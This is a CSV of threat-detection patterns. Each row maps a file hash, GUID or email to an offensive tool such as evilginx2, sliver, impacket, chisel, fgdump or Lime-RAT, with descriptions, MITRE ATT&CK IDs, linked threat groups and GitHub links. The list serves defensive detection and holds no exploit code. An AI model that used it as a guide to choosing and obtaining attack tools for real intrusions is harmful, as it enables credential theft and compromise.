"*14442756c9e9124e5f854b6c24d1176ee2f393732fc52a9df45486aef98abbc5*",".{0,1000}14442756c9e9124e5f854b6c24d1176ee2f393732fc52a9df45486aef98abbc5.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","22187"
"*1446b2b7ac055dd73177e7610141376dcdb8419b0422f81d69c589ce60e83e42*",".{0,1000}1446b2b7ac055dd73177e7610141376dcdb8419b0422f81d69c589ce60e83e42.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22188"
"*144ee3c2d9af200cbe10a4d0f9f78ff8fc5318ff75927e0da17b0679b002b071*",".{0,1000}144ee3c2d9af200cbe10a4d0f9f78ff8fc5318ff75927e0da17b0679b002b071.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22189"
"*14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715*",".{0,1000}14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22190"
"*1460d78f92f67929b451732af1d24752026b9d91fd85faec196460f7d4cac9f9*",".{0,1000}1460d78f92f67929b451732af1d24752026b9d91fd85faec196460f7d4cac9f9.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22193"
"*146371bea2dc7c088fd3e7b14e3156b838db646cd818ee5b95d7d792d31834eb*",".{0,1000}146371bea2dc7c088fd3e7b14e3156b838db646cd818ee5b95d7d792d31834eb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22194"
"*1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052*",".{0,1000}1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22195"
"*146c1dbd6fc6758d9adbda9490b8272de6aeec711bafd925ad4057c3a2c317c1*",".{0,1000}146c1dbd6fc6758d9adbda9490b8272de6aeec711bafd925ad4057c3a2c317c1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22197"
"*146ca286f362290e96eda2a0b7cd9feb4e971763ba194731d1826e12e593439d*",".{0,1000}146ca286f362290e96eda2a0b7cd9feb4e971763ba194731d1826e12e593439d.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","22198"
"*14770541b6a28f6c51b79793e8f7b16baef3127edd89a58eeaac723af7706a1c*",".{0,1000}14770541b6a28f6c51b79793e8f7b16baef3127edd89a58eeaac723af7706a1c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22200"
"*1479fd64414f539188555cdf30c408fc9c42949d2b98fd55662b1b3ae93894e0*",".{0,1000}1479fd64414f539188555cdf30c408fc9c42949d2b98fd55662b1b3ae93894e0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22201"
"*1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030*",".{0,1000}1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22203"
"*148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc*",".{0,1000}148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22205"
"*148b284dead436f9dbbc23f7e4861901ddc7f1d2cc03c49b8b0379ff6b5633b4*",".{0,1000}148b284dead436f9dbbc23f7e4861901ddc7f1d2cc03c49b8b0379ff6b5633b4.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","22206"
"*149c0f553685f985a2eb714d9dcc54541423e57b4aecea5f2bdb747dfb9cc06d*",".{0,1000}149c0f553685f985a2eb714d9dcc54541423e57b4aecea5f2bdb747dfb9cc06d.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","22207"
"*14a0ceba63b3d76d7d30653112a0b43e3a2ef1f07a8030d7a949696b5c3065f6*",".{0,1000}14a0ceba63b3d76d7d30653112a0b43e3a2ef1f07a8030d7a949696b5c3065f6.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","22209"
"*14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e*",".{0,1000}14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22210"
"*14a2502eebb62133aad519e2717558388f459a4fe281566fbeb0251b0ab2611b*",".{0,1000}14a2502eebb62133aad519e2717558388f459a4fe281566fbeb0251b0ab2611b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22211"
"*14ba976d3427c5982fb1348b6d9212646e63e7531311fb362496f801f312594c*",".{0,1000}14ba976d3427c5982fb1348b6d9212646e63e7531311fb362496f801f312594c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22215"
"*14CA405B-8BAC-48AB-9FBA-8FB5DF88FD0D*",".{0,1000}14CA405B\-8BAC\-48AB\-9FBA\-8FB5DF88FD0D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22219"
"*14cacb095c7f6d3347fe36b6576fde73047897330bae662fc29ef9f8169e0136*",".{0,1000}14cacb095c7f6d3347fe36b6576fde73047897330bae662fc29ef9f8169e0136.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","22221"
"*14cb65175994e6e27ef631df1e99744308197f80c84d86ea457dd98a1d89f608*",".{0,1000}14cb65175994e6e27ef631df1e99744308197f80c84d86ea457dd98a1d89f608.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22223"
"*14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46*",".{0,1000}14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22224"
"*14d65cb6ca5442b1c30f51ea73199b7bf32db17f5bb6c483346c13e0014545b0*",".{0,1000}14d65cb6ca5442b1c30f51ea73199b7bf32db17f5bb6c483346c13e0014545b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22227"
"*14d97dd35d6f42a44d6fa39a0fac3349848e9297f7c43cacc3bc4c2b045a4467*",".{0,1000}14d97dd35d6f42a44d6fa39a0fac3349848e9297f7c43cacc3bc4c2b045a4467.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22228"
"*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*",".{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","22230"
"*14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff*",".{0,1000}14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#filehash","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","22232"
"*14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b*",".{0,1000}14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22234"
"*14f4e4311f119b7de45d53d0e48d8fe27afdfc1026bab7259ea6191c92c6faa0*",".{0,1000}14f4e4311f119b7de45d53d0e48d8fe27afdfc1026bab7259ea6191c92c6faa0.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22236"
"*15010050@tutamail.com*",".{0,1000}15010050\@tutamail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","22238"
"*1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d*",".{0,1000}1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","22239"
"*15065a09f2a944aa4376a3efe035b209f2c9617be19e08640320fb874e0e991c*",".{0,1000}15065a09f2a944aa4376a3efe035b209f2c9617be19e08640320fb874e0e991c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22240"
"*15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8*",".{0,1000}15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22241"
"*1515c3b59422ffaaa8ca8eea53ae86a27a2c107972aa84e6b9cca68c7c9d53a1*",".{0,1000}1515c3b59422ffaaa8ca8eea53ae86a27a2c107972aa84e6b9cca68c7c9d53a1.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22243"
"*1526febbe627085a24dd59eefa206fddd88326d78beb00b6630989cc13526733*",".{0,1000}1526febbe627085a24dd59eefa206fddd88326d78beb00b6630989cc13526733.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","22247"
"*1527fd3f217431af5c9c015db53aa229bb015d01babfd5fc83976ceb1f84a186*",".{0,1000}1527fd3f217431af5c9c015db53aa229bb015d01babfd5fc83976ceb1f84a186.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22248"
"*15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9*",".{0,1000}15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","22250"
"*154108656a02f90337dab0afac5056524caaf8bb08534f7c64c55f1fb2dbbc7a*",".{0,1000}154108656a02f90337dab0afac5056524caaf8bb08534f7c64c55f1fb2dbbc7a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22251"
"*155ae1264e89d69b716194c767d7b05e48588c30559be534b056a6a837ab998b*",".{0,1000}155ae1264e89d69b716194c767d7b05e48588c30559be534b056a6a837ab998b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22254"
"*155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa*",".{0,1000}155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22255"
"*1563ac6f8ae849b7ab2da0a5a154f29449cfd13917b9a13bc6ebab004445075d*",".{0,1000}1563ac6f8ae849b7ab2da0a5a154f29449cfd13917b9a13bc6ebab004445075d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22256"
"*1565f9e89e6675525375dcb0e69cf08ef9a77a3d5bba36f89266a2c098dc6bda*",".{0,1000}1565f9e89e6675525375dcb0e69cf08ef9a77a3d5bba36f89266a2c098dc6bda.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","22257"
"*156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a*",".{0,1000}156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","#filehash","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","22258"
"*156e71ab72393301c2a27995c869afd9972b5fcf4f3a7e92e8335358f11e0306*",".{0,1000}156e71ab72393301c2a27995c869afd9972b5fcf4f3a7e92e8335358f11e0306.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22259"
"*15835E15B02D775A71F29ECEF61FC3E5ADB50C13F8987072A945AF99A17C0F6E*",".{0,1000}15835E15B02D775A71F29ECEF61FC3E5ADB50C13F8987072A945AF99A17C0F6E.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22263"
"*1587d5a67e91ff3f4b00b409066305ddad3796be41945de2a486b311b9425b97*",".{0,1000}1587d5a67e91ff3f4b00b409066305ddad3796be41945de2a486b311b9425b97.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22264"
